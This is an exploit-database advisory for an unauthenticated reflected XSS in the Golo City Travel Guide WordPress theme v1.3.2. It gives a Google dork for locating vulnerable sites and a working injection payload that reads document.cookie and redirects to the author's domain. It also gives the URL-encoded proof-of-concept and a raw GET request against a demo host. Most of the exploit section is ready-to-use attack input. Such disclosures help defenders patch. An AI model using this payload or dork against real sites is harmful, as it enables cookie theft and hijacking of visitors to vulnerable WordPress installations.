Golo - City Travel Guide WordPress Theme v1.3.2 - Unauthenticated Reflected XSS
CVE
Category
Price
Severity
CWE-79
Not specified
Medium
Author
Risk
Exploitation Type
Date
Exploit Alert
High
Remote
2020-07-13
CPE
cpe:cpe:/a:wordpress:golo_city_travel_guide:1.3.2
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070068 Below is a copy:
Golo - City Travel Guide WordPress Theme v1.3.2 - Unauthenticated Reflected XSS [+] Exploit Title: Golo - City Travel Guide WordPress Theme v1.3.2 - Unauthenticated Reflected XSS
[+] Google Dork: inurl:/wp-content/themes/golo/
[+] Date: 2020-07-01
[+] Exploit Author: Vlad Vector [ https://vladvector.ru ]
[+] Vendor: Uxper [ http://uxper.co ]
[+] Software Version: 1.3.2
[+] Software Link: https://themeforest.net/item/golo-city-guide-wordpress-theme/25397810
[+] Tested on: Debian 10
[+] CVE:
[+] CWE: CWE-79
### [ Info: ]
[i] An Unauthenticated Reflected XSS vulnerability was discovered in the Golo theme v1.3.2 for WordPress.
### [ Payload: ]
[$] "><img src=x onerror=(alert)(`VLDVCTOR`);(alert)(document.cookie);window.location=`https://vladvector.ru`;//">
### [ PoC: ]
[!] https://wp.getgolo.com/?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place
[!] GET /?s=%22%3E%3Cimg+src%3Dx+onerror%3D%28alert%29%28%60VL%CE%9BDV%CE%9ECTOR%60%29%3B%28alert%29%28document.cookie%29%3Bwindow.location%3D%60https%3A%2F%2Fvladvector.ru%60%3B%2F%2F%22%3E&post_type=place HTTP/1.1
Host: wp.getgolo.com
### [ Contacts: ]
[#] Website: vladvector.ru
[#] Telegram: @vladvector
[#] Twitter: @vlad_vector
[#] GitHub: @vladvector
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum